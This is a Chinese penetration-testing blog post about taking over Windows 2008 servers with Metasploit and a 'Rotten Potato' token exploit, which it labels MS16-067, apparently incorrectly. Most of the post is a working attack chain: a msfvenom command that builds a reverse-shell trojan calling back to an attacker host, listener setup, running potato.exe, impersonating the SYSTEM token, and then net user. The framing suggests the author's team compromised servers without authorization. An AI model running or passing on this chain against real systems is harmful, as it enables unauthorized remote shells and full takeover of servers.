1. 首页
  2. 渗透测试

MSF+MS16-067提权拿下服务器

这两天团队一直在一起日站,碰到了很多08的服务器。各种exp打下来不是没权限就是打上了补丁,然后东哥Si试了下这个MS16-067也就是烂土豆,然后喜加好几台服务器。美滋滋。这篇文章就是记个笔记。

 

生成反弹木马命令

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.33 LPORT=4433 -f exe -o 4433.exe

反弹到的主机地址为192.168.1.33,端口为4433,生成的木马文件为4433.exe

将4433.exe上传到需要提权的目标服务器上

 

msfconsole下监听

use exploit/multi/handler

set PAYLOAD windows/meterpreter/reverse_tcp

set LHOST 192.168.1.33 //实际情况中需要将192.168.1.33换成公网IP地址

set LPORT 4433

exploit

在shell里运行4433.exe

 

然后msf会收到一个session

 

这时候我们传上去potato.exe也就是我们的烂土豆,在这里下载

use incognito 
list_tokens -u //列出tokens 
execute -cH -f ./potato.exe //执行exp 
list_tokens -u 
impersonate_token "NT AUTHORITY\\SYSTEM" //提权

劫持到system的令牌就舒服了,然后就是一顿net user,最后喜加一!

上一张东哥的截图,实际上我也有,懒得截图了- -。

MSF+MS16-067提权拿下服务器

原创文章,作者:Y4er,未经授权禁止转载!如若转载,请联系作者:Y4er

发表评论

电子邮件地址不会被公开。 必填项已用*标注

联系我们

在线咨询:点击这里给我发消息

QR code